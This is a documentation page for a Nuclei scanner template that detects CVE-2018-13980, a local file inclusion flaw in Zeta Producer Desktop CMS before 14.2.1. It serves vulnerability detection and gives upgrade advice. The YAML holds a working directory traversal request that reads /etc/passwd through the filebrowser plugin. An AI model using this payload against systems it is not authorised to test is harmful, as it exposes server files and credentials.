Skip to content
Nuclei Templates

Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion

ID: CVE-2018-13980

Severity: medium

Author: wisnupramoedya

Tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer

Description

Section titled “Description”

Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin “filebrowser” is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.

YAML Source

Section titled “YAML Source”
id: CVE-2018-13980


info:
  name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion
  author: wisnupramoedya
  severity: medium
  description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45016
    - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/
    - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-13980
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.5
    cve-id: CVE-2018-13980
    cwe-id: CWE-22
    epss-score: 0.0018
    epss-percentile: 0.55107
    cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeta-producer
    product: zeta_producer
  tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer


http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bd7050d4acc22a9a71bd09674a75155a6d31405812f64adde0dec041a327556f022100894c466efc36e66592eafe58b07ca7bf019717ee09bde3eae1e1330e5ef1b837:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-13980.yaml"

View on Github